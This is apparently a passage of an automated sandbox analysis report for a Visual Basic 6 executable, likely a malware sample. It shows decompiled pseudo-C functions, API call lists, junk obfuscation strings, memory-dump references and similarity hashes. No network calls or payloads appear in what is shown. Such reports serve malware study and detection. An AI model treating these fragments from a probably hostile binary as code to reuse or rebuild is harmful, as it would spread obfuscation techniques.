Function 0040A7FE, Relevance: 33.3, APIs: 16, Strings: 3, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040A7FE(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v72;
				signed int _v76;
				signed int _t31;
				char* _t34;
				char* _t35;
				intOrPtr _t52;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t31 = 0x38;
				L00401420();
				_v12 = _t52;
				_v8 = 0x4013c8;
				L0040163C();
				_push(0);
				_push(0xffffffff);
				_push(1);
				_push(0);
				_push(0x402b9c);
				_push(_v36);
				L004014DA();
				L00401678();
				_push(_v36);
				_push(0x402ba4);
				L0040167E();
				if(_t31 != 0) {
					_push(0x3e);
					L00401642();
					_v32 = _t31;
				}
				_push(0x4029a8);
				L004014D4();
				if(_t31 != 1) {
					if( *0x40c33c != 0) {
						_v72 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026c8);
						L0040165A();
						_v72 = 0x40c33c;
					}
					_v60 =  *_v72;
					_t34 =  &_v56;
					L0040152E();
					L00401534();
					_t35 =  &_v40;
					L00401582();
					_t31 =  *((intOrPtr*)( *_v60 + 0xc))(_v60, _t35, _t35, _t34, _t34, _t34, _v28, L"YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30", 0);
					asm("fclex");
					_v64 = _t31;
					if(_v64 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0xc);
						_push(0x4026b8);
						_push(_v60);
						_push(_v64);
						L00401654();
						_v76 = _t31;
					}
					L004015E8();
					L0040164E();
				}
				_v24 = 0x3b49;
				_push(E0040A94D);
				L004015E8();
				L0040166C();
				return _t31;
			}

0x0040a803
0x0040a80e
0x0040a80f
0x0040a818
0x0040a819
0x0040a821
0x0040a824
0x0040a833
0x0040a838
0x0040a83a
0x0040a83c
0x0040a83e
0x0040a840
0x0040a845
0x0040a848
0x0040a852
0x0040a857
0x0040a85a
0x0040a85f
0x0040a866
0x0040a868
0x0040a86a
0x0040a86f
0x0040a86f
0x0040a872
0x0040a877
0x0040a880
0x0040a88d
0x0040a8a7
0x0040a88f
0x0040a88f
0x0040a894
0x0040a899
0x0040a89e
0x0040a89e
0x0040a8b3
0x0040a8c0
0x0040a8c4
0x0040a8cd
0x0040a8d3
0x0040a8d7
0x0040a8e5
0x0040a8e8
0x0040a8ea
0x0040a8f1
0x0040a90a
0x0040a8f3
0x0040a8f3
0x0040a8f5
0x0040a8fa
0x0040a8fd
0x0040a900
0x0040a905
0x0040a905
0x0040a911
0x0040a919
0x0040a919
0x0040a91e
0x0040a924
0x0040a93f
0x0040a947
0x0040a94c

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A819
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0040A833
#712.MSVBVM60(?,00402B9C,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A848
__vbaStrMove.MSVBVM60(?,00402B9C,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A852
__vbaStrCmp.MSVBVM60(00402BA4,?,?,00402B9C,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A85F
#569.MSVBVM60(0000003E,00402BA4,?,?,00402B9C,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A86A
__vbaI2Str.MSVBVM60(004029A8,00402BA4,?,?,00402B9C,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A877
__vbaNew2.MSVBVM60(004026C8,0040C33C,004029A8,00402BA4,?,?,00402B9C,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A899
__vbaLateMemCallLd.MSVBVM60(?,?,YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30,00000000,004029A8,00402BA4,?,?,00402B9C,00000000,00000001,000000FF,00000000), ref: 0040A8C4
__vbaObjVar.MSVBVM60(00000000), ref: 0040A8CD
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 0040A8D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,0000000C), ref: 0040A900
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040A911
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040A919
__vbaFreeObj.MSVBVM60(0040A94D,004029A8,00402BA4,?,?,00402B9C,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A93F
__vbaFreeStr.MSVBVM60(0040A94D,004029A8,00402BA4,?,?,00402B9C,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A947

Strings

I;, xrefs: 0040A91E
YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30, xrefs: 0040A8B8
cer, xrefs: 0040A82B

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#569#712AddrefCallCheckChkstkCopyHresultLateMoveNew2
String ID: I;$YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30$cer
API String ID: 1705650133-4229211588
Opcode ID: d38e5f10a9ac51df7428320312f14e095b419c1679cd80bff2aa6979621af5b3
Instruction ID: c7b000a85fb5dcdb764472da24d80c82ccdda38e62d378bdf89dbaaa3dae641a
Opcode Fuzzy Hash: d38e5f10a9ac51df7428320312f14e095b419c1679cd80bff2aa6979621af5b3
Instruction Fuzzy Hash: 76314A71A40208BBDB10EB91DD86FEDBBB4AF14704F60453AF001761F1DABD69418B59

Uniqueness

Uniqueness Score: -1.00%

Function 00409FC5, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00409FC5(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				char* _v28;
				void* _v32;
				short _v36;
				void* _v52;
				char _v56;
				char _v72;
				char _v88;
				char* _v96;
				intOrPtr _v104;
				short _v108;
				signed int _t30;
				char* _t34;
				char* _t39;
				void* _t51;
				void* _t53;
				long long* _t54;
				char* _t55;
				long long _t56;

				_t56 = __fp0;
				_t54 = _t53 - 0xc;
				 *[fs:0x0] = _t54;
				L00401420();
				_v16 = _t54;
				_v12 = 0x401360;
				_v8 = 0;
				_t30 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x401426, _t51);
				L0040163C();
				_push(2);
				_push(0x402ac0);
				L00401510();
				L00401678();
				_push(_t30);
				_push(0x402acc);
				L0040167E();
				asm("sbb eax, eax");
				_v108 =  ~( ~( ~_t30));
				_t39 =  &_v56;
				L0040166C();
				_t34 = _v108;
				_t55 = _t34;
				if(_t55 != 0) {
					_push(0xc9);
					L00401642();
					_v28 = _t34;
				}
				asm("fldz");
				_push(_t39);
				_push(_t39);
				 *_t54 = _t56;
				L0040150A();
				L004015F4();
				asm("fcomp qword [0x401358]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t55 != 0) {
					_v96 = L"GASTROCHAENA";
					_v104 = 8;
					L004015BE();
					_push( &_v72);
					_t34 =  &_v88;
					_push(_t34);
					L00401504();
					L00401630();
					L0040164E();
				}
				_v36 = 0x3a9a;
				asm("wait");
				_push(E0040A0E9);
				L0040166C();
				L0040164E();
				return _t34;
			}

0x00409fc5
0x00409fc8
0x00409fd7
0x00409fe1
0x00409fe9
0x00409fec
0x00409ff3
0x0040a002
0x0040a00b
0x0040a010
0x0040a012
0x0040a017
0x0040a021
0x0040a026
0x0040a027
0x0040a02c
0x0040a033
0x0040a039
0x0040a03d
0x0040a040
0x0040a045
0x0040a049
0x0040a04b
0x0040a04d
0x0040a052
0x0040a057
0x0040a057
0x0040a05a
0x0040a05c
0x0040a05d
0x0040a05e
0x0040a061
0x0040a066
0x0040a06b
0x0040a071
0x0040a073
0x0040a074
0x0040a076
0x0040a07d
0x0040a08a
0x0040a092
0x0040a093
0x0040a096
0x0040a097
0x0040a0a2
0x0040a0aa
0x0040a0aa
0x0040a0af
0x0040a0b5
0x0040a0b6
0x0040a0db
0x0040a0e3
0x0040a0e8

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00409FE1
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0040A00B
#512.MSVBVM60(00402AC0,00000002,?,?,?,?,00401426), ref: 0040A017
__vbaStrMove.MSVBVM60(00402AC0,00000002,?,?,?,?,00401426), ref: 0040A021
__vbaStrCmp.MSVBVM60(00402ACC,00000000,00402AC0,00000002,?,?,?,?,00401426), ref: 0040A02C
__vbaFreeStr.MSVBVM60(00402ACC,00000000,00402AC0,00000002,?,?,?,?,00401426), ref: 0040A040
#569.MSVBVM60(000000C9,00402ACC,00000000,00402AC0,00000002,?,?,?,?,00401426), ref: 0040A052
#585.MSVBVM60(?,?,00402ACC,00000000,00402AC0,00000002,?,?,?,?,00401426), ref: 0040A061
__vbaFpR8.MSVBVM60(?,?,00402ACC,00000000,00402AC0,00000002,?,?,?,?,00401426), ref: 0040A066
__vbaVarDup.MSVBVM60 ref: 0040A08A
#666.MSVBVM60(?,?), ref: 0040A097
__vbaVarMove.MSVBVM60(?,?), ref: 0040A0A2
__vbaFreeVar.MSVBVM60(?,?), ref: 0040A0AA
__vbaFreeStr.MSVBVM60(0040A0E9,?,?,00402ACC,00000000,00402AC0,00000002), ref: 0040A0DB
__vbaFreeVar.MSVBVM60(0040A0E9,?,?,00402ACC,00000000,00402AC0,00000002), ref: 0040A0E3

Strings

GASTROCHAENA, xrefs: 0040A076

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#512#569#585#666ChkstkCopy
String ID: GASTROCHAENA
API String ID: 1152186010-732072593
Opcode ID: 5cdeab27677b5cf82c1fa4772cc89373531c73211e2d5deeb1266326805e4926
Instruction ID: d7f2d6e7a7ac681b23e320b76569e89de2810aabc18cdf2fb26fda6a6a90e51b
Opcode Fuzzy Hash: 5cdeab27677b5cf82c1fa4772cc89373531c73211e2d5deeb1266326805e4926
Instruction Fuzzy Hash: B3210A70910209ABCB00EFA1CD56EAEB7B4AF50B44F14853BB006BB1E1DB7D5A05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC45, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040AC45(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char* _v52;
				intOrPtr _v60;
				intOrPtr _v84;
				intOrPtr _v92;
				short _v112;
				char* _t34;
				char* _t36;
				short _t37;
				intOrPtr _t63;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t63;
				_push(0x60);
				L00401420();
				_v12 = _t63;
				_v8 = 0x4013f8;
				_v52 = L"11-11-11";
				_v60 = 8;
				L004015BE();
				_t34 =  &_v44;
				_push(_t34);
				L0040157C();
				_v112 =  ~(0 | _t34 != 0x0000ffff);
				L0040164E();
				if(_v112 != 0) {
					_v52 = L"Overtook6";
					_v60 = 8;
					_v84 = 0x81d81b;
					_v92 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98");
					_push(_v28);
					L004015FA();
				}
				_v52 = L"11-11-11";
				_v60 = 8;
				L004015BE();
				_t36 =  &_v44;
				_push(_t36);
				L0040157C();
				_v112 =  ~(0 | _t36 != 0x0000ffff);
				L0040164E();
				_t37 = _v112;
				if(_t37 != 0) {
					_push(0x4e);
					L004014C8();
					_v24 = _t37;
				}
				_push(E0040AD6A);
				L004015E8();
				return _t37;
			}

0x0040ac4a
0x0040ac55
0x0040ac56
0x0040ac5d
0x0040ac60
0x0040ac68
0x0040ac6b
0x0040ac72
0x0040ac79
0x0040ac86
0x0040ac8b
0x0040ac8e
0x0040ac8f
0x0040ac9f
0x0040aca6
0x0040acb1
0x0040acb3
0x0040acba
0x0040acc1
0x0040acc8
0x0040accf
0x0040acd2
0x0040acdc
0x0040acdd
0x0040acde
0x0040acdf
0x0040ace0
0x0040ace3
0x0040aced
0x0040acee
0x0040acef
0x0040acf0
0x0040acf1
0x0040acf3
0x0040acf8
0x0040acfb
0x0040ad00
0x0040ad03
0x0040ad0a
0x0040ad17
0x0040ad1c
0x0040ad1f
0x0040ad20
0x0040ad30
0x0040ad37
0x0040ad3c
0x0040ad42
0x0040ad44
0x0040ad46
0x0040ad4e
0x0040ad4e
0x0040ad51
0x0040ad64
0x0040ad69

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040AC60
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AC86
#557.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AC8F
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ACA6
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0040ACD2
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0040ACE3
__vbaLateMemCall.MSVBVM60(?,kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98,00000002,?,?,?,?,?,?,?,?), ref: 0040ACFB
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AD17
#557.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AD20
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AD37
#571.MSVBVM60(0000004E,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AD46
__vbaFreeObj.MSVBVM60(0040AD6A,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AD64

Strings

11-11-11, xrefs: 0040AC72, 0040AD03
kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98, xrefs: 0040ACF3
Overtook6, xrefs: 0040ACB3

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkFree$#557$#571CallLate
String ID: 11-11-11$Overtook6$kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98
API String ID: 3750654714-3297755928
Opcode ID: 8a1931740a9cb681f0c938cc1b177195c43773d6fdf9d4c6c215e7867602e91a
Instruction ID: e2d0b84c478f3b9857b3531a8124f6efeea74436f66e66aef6bc90b7da0de134
Opcode Fuzzy Hash: 8a1931740a9cb681f0c938cc1b177195c43773d6fdf9d4c6c215e7867602e91a
Instruction Fuzzy Hash: A2318F70D00309ABDB14EFA1D886BEEBBB8EF05704F44453AF501BB1E0DBB855898B19

Uniqueness

Uniqueness Score: -1.00%

Function 004093E0, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004093E0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				char* _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				intOrPtr _v152;
				intOrPtr* _v156;
				signed int _v160;
				signed int _v164;
				char* _t64;
				signed int _t71;
				signed int _t76;
				signed int _t77;
				void* _t92;
				void* _t94;
				intOrPtr _t95;

				_t95 = _t94 - 0xc;
				 *[fs:0x0] = _t95;
				L00401420();
				_v16 = _t95;
				_v12 = 0x4012b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t92);
				_v68 = 0x4029a8;
				_v76 = 8;
				_v84 = 1;
				_v92 = 0x8002;
				_push( &_v76);
				_t64 =  &_v92;
				_push(_t64);
				L00401612();
				if(_t64 != 0) {
					_v68 = L"Solicits9";
					_v76 = 8;
					_v100 = 0xdb81d;
					_v108 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"chtN96");
					_push(_v32);
					L004015FA();
				}
				if( *0x40c33c != 0) {
					_v156 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026c8);
					L0040165A();
					_v156 = 0x40c33c;
				}
				_v128 =  *_v156;
				_t71 =  *((intOrPtr*)( *_v128 + 0x14))(_v128,  &_v44);
				asm("fclex");
				_v132 = _t71;
				if(_v132 >= 0) {
					_v160 = _v160 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026b8);
					_push(_v128);
					_push(_v132);
					L00401654();
					_v160 = _t71;
				}
				_v136 = _v44;
				_t76 =  *((intOrPtr*)( *_v136 + 0xe8))(_v136,  &_v40);
				asm("fclex");
				_v140 = _t76;
				if(_v140 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x402918);
					_push(_v136);
					_push(_v140);
					L00401654();
					_v164 = _t76;
				}
				_t77 = _v40;
				_v152 = _t77;
				_v40 = _v40 & 0x00000000;
				L00401678();
				L004015E8();
				_v28 = 0x2e8f;
				_push(E004095CC);
				L004015E8();
				L0040166C();
				return _t77;
			}

0x004093e3
0x004093f2
0x004093fe
0x00409406
0x00409409
0x00409410
0x0040941f
0x00409422
0x00409429
0x00409430
0x00409437
0x00409441
0x00409442
0x00409445
0x00409446
0x00409450
0x00409452
0x00409459
0x00409460
0x00409467
0x0040946e
0x00409471
0x0040947b
0x0040947c
0x0040947d
0x0040947e
0x0040947f
0x00409482
0x0040948c
0x0040948d
0x0040948e
0x0040948f
0x00409490
0x00409492
0x00409497
0x0040949a
0x0040949f
0x004094a9
0x004094c6
0x004094ab
0x004094ab
0x004094b0
0x004094b5
0x004094ba
0x004094ba
0x004094d8
0x004094e7
0x004094ea
0x004094ec
0x004094f3
0x0040950f
0x004094f5
0x004094f5
0x004094f7
0x004094fc
0x004094ff
0x00409502
0x00409507
0x00409507
0x00409519
0x00409531
0x00409537
0x00409539
0x00409546
0x0040956b
0x00409548
0x00409548
0x0040954d
0x00409552
0x00409558
0x0040955e
0x00409563
0x00409563
0x00409572
0x00409575
0x0040957b
0x00409588
0x00409590
0x00409595
0x0040959b
0x004095be
0x004095c6
0x004095cb

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 004093FE
__vbaVarTstNe.MSVBVM60(00008002,00000008), ref: 00409446
__vbaChkstk.MSVBVM60(?,?,00008002,00000008), ref: 00409471
__vbaChkstk.MSVBVM60(?,?,00008002,00000008), ref: 00409482
__vbaLateMemCall.MSVBVM60(?,chtN96,00000002,?,?,00008002,00000008), ref: 0040949A
__vbaNew2.MSVBVM60(004026C8,0040C33C,00008002,00000008), ref: 004094B5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,00000014), ref: 00409502
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402918,000000E8), ref: 0040955E
__vbaStrMove.MSVBVM60 ref: 00409588
__vbaFreeObj.MSVBVM60 ref: 00409590
__vbaFreeObj.MSVBVM60(004095CC), ref: 004095BE
__vbaFreeStr.MSVBVM60(004095CC), ref: 004095C6

Strings

Solicits9, xrefs: 00409452
chtN96, xrefs: 00409492

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkFree$CheckHresult$CallLateMoveNew2
String ID: Solicits9$chtN96
API String ID: 86130054-2940086331
Opcode ID: f48c5dbec9146f4715981fe1799e99054a5ce732bda147ad63432c69d76c8c66
Instruction ID: 6bc9c84d899e39819266b47f6ab4b085434a13373f955efa02275c126471c414
Opcode Fuzzy Hash: f48c5dbec9146f4715981fe1799e99054a5ce732bda147ad63432c69d76c8c66
Instruction Fuzzy Hash: 6F511771D00218EBDB11DF95CC85BCDBBB4BF08308F5085AAE409BB2A1CBB959859F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3D6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0040A3D6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				short _v32;
				char* _v40;
				char _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				intOrPtr _v104;
				intOrPtr _v112;
				char* _v136;
				char _v144;
				intOrPtr _v168;
				intOrPtr _v176;
				short _v196;
				short _t49;
				short _t54;
				void* _t70;
				void* _t72;
				intOrPtr _t73;

				_t73 = _t72 - 0xc;
				 *[fs:0x0] = _t73;
				L00401420();
				_v16 = _t73;
				_v12 = 0x401398;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t70);
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0xc;
				_v48 = 2;
				_push(1);
				_push(1);
				_push( &_v64);
				_push( &_v48);
				_push( &_v80);
				L004014F2();
				_v136 = 0xc;
				_v144 = 0x8002;
				_push( &_v80);
				_t49 =  &_v144;
				_push(_t49);
				L00401612();
				_v196 = _t49;
				_push( &_v80);
				_push( &_v64);
				_push( &_v48);
				_push(3);
				L00401600();
				if(_v196 != 0) {
					_v104 = _a4;
					_v112 = 9;
					_v136 = L"rigmand";
					_v144 = 8;
					_v168 = 0x77553b;
					_v176 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"ISA93");
					_push(_v28);
					L004015FA();
				}
				_v40 = 0x80020004;
				_v48 = 0xa;
				_t54 =  &_v48;
				_push(_t54);
				L0040155E();
				_v32 = _t54;
				L0040164E();
				_push(E0040A567);
				L004015E8();
				return _t54;
			}

0x0040a3d9
0x0040a3e8
0x0040a3f4
0x0040a3fc
0x0040a3ff
0x0040a406
0x0040a415
0x0040a418
0x0040a41f
0x0040a426
0x0040a42d
0x0040a434
0x0040a436
0x0040a43b
0x0040a43f
0x0040a443
0x0040a444
0x0040a449
0x0040a453
0x0040a460
0x0040a461
0x0040a467
0x0040a468
0x0040a46d
0x0040a477
0x0040a47b
0x0040a47f
0x0040a480
0x0040a482
0x0040a493
0x0040a49c
0x0040a49f
0x0040a4a6
0x0040a4b0
0x0040a4ba
0x0040a4c4
0x0040a4ce
0x0040a4d1
0x0040a4db
0x0040a4dc
0x0040a4dd
0x0040a4de
0x0040a4df
0x0040a4e2
0x0040a4ef
0x0040a4f0
0x0040a4f1
0x0040a4f2
0x0040a4f3
0x0040a4f6
0x0040a503
0x0040a504
0x0040a505
0x0040a506
0x0040a507
0x0040a509
0x0040a50e
0x0040a511
0x0040a516
0x0040a519
0x0040a520
0x0040a527
0x0040a52a
0x0040a52b
0x0040a530
0x0040a537
0x0040a53c
0x0040a561
0x0040a566

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A3F4
#660.MSVBVM60(?,00000002,0000000A,00000001,00000001), ref: 0040A444
__vbaVarTstNe.MSVBVM60(00008002,?), ref: 0040A468
__vbaFreeVarList.MSVBVM60(00000003,00000002,0000000A,?,00008002,?), ref: 0040A482
__vbaChkstk.MSVBVM60 ref: 0040A4D1
__vbaChkstk.MSVBVM60 ref: 0040A4E2
__vbaChkstk.MSVBVM60 ref: 0040A4F6
__vbaLateMemCall.MSVBVM60(?,ISA93,00000003), ref: 0040A511
#648.MSVBVM60(0000000A), ref: 0040A52B
__vbaFreeVar.MSVBVM60(0000000A), ref: 0040A537
__vbaFreeObj.MSVBVM60(0040A567,0000000A), ref: 0040A561

Strings

;Uw, xrefs: 0040A4BA
rigmand, xrefs: 0040A4A6
ISA93, xrefs: 0040A509

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$Free$#648#660CallLateList
String ID: ;Uw$ISA93$rigmand
API String ID: 2694029159-1757006994
Opcode ID: 59d8ff6d6812ac08b1d459f9bba82f41fc58f7f665eb499a013dfe07707603c7
Instruction ID: 93c9c72ee42aad7dc54d71d88d34ad14ad3cca289c4826f0c775028088a453ab
Opcode Fuzzy Hash: 59d8ff6d6812ac08b1d459f9bba82f41fc58f7f665eb499a013dfe07707603c7
Instruction Fuzzy Hash: 8A413DB1D00308EBDB11DF95C846BCEB7B9BF09704F40846AF504BB291DBB99A458F65

Uniqueness

Uniqueness Score: -1.00%

Function 004090CB, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E004090CB(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				long long* _v12;
				char _v36;
				char* _v44;
				intOrPtr _v52;
				char* _t16;
				char* _t18;
				long long* _t28;
				void* _t29;
				long long _t31;

				_t29 = __eflags;
				_t18 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t28;
				_t16 = 0x24;
				L00401420();
				_v12 = _t28;
				_v8 = 0x401298;
				_push(__ecx);
				_push(__ecx);
				 *_t28 =  *0x401290;
				_t31 =  *0x401290;
				_push(__ecx);
				_push(__ecx);
				 *_t28 = _t31;
				asm("fldz");
				_push(__ecx);
				_push(__ecx);
				 *_t28 = _t31;
				L004015CA();
				L004015F4();
				asm("fcomp qword [0x401288]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v44 = L"penplotter";
					_v52 = 8;
					L004015BE();
					_t16 =  &_v36;
					_push(_t16);
					L004015C4();
					_t18 =  &_v36;
					L0040164E();
				}
				asm("fldz");
				_push(_t18);
				_push(_t18);
				 *_t28 = _t31;
				L004015B8();
				L004015F4();
				asm("fcomp qword [0x401280]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t29 != 0) {
					_v44 = L"Betjeningens";
					_v52 = 8;
					L004015BE();
					_t16 =  &_v36;
					_push(_t16);
					L004015C4();
					L0040164E();
				}
				asm("wait");
				_push(E004091AC);
				return _t16;
			}

0x004090cb
0x004090cb
0x004090ce
0x004090cf
0x004090d0
0x004090db
0x004090dc
0x004090e5
0x004090e6
0x004090ee
0x004090f1
0x004090fe
0x004090ff
0x00409100
0x00409103
0x00409109
0x0040910a
0x0040910b
0x0040910e
0x00409110
0x00409111
0x00409112
0x00409115
0x0040911a
0x0040911f
0x00409125
0x00409127
0x00409128
0x0040912a
0x00409131
0x0040913e
0x00409143
0x00409146
0x00409147
0x0040914c
0x0040914f
0x0040914f
0x00409154
0x00409156
0x00409157
0x00409158
0x0040915b
0x00409160
0x00409165
0x0040916b
0x0040916d
0x0040916e
0x00409170
0x00409177
0x00409184
0x00409189
0x0040918c
0x0040918d
0x00409195
0x00409195
0x0040919a
0x0040919b
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 004090E6
#671.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401426), ref: 00409115
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040911A
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040913E
#529.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00409147
